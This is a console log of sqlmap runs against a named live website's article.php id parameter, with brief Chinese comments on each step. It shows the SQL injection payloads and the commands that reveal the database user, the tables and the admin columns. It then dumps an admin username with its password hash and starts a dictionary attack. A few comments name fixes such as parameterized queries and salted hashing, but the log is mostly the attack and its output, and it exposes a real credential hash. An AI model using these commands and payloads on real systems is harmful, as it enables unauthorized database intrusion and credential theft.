D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --current-user /* 注解:获取当前用户名称
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:53:54
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
/* 注解:四种注入类型都出现在同一个 GET 参数 id 上,看起来该参数未经校验就拼进了 SQL 语句;修复方法是使用预编译(参数化)查询,并把 id 强制校验为整数
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost' /* 注解:网站以 root 账号连接数据库,不符合最小权限原则;应改用只对本库有必要权限的专用账号
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.wepost.com.hk' shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --current-db /*当前数据库
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:54:16
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.wepost.com.hk' shutting down at: 16:54:18
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:55:25
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.wepost.com.hk' shutting down at: 16:55:33
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:56:06
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
ssion': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+
shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:57:14
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack o
n retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |" Y2 E( E& ], B4 ` E$ c9 R' m
+----------------------------------+------------+
/* 注解:password 列是 32 位十六进制字符串,长度与 MD5 摘要一致(推测,未见加盐);口令应改用加盐的慢哈希算法(如 bcrypt)存储,否则一旦泄露很容易被字典还原
shutting down at: 16:58:14

D:\Python27\sqlmap>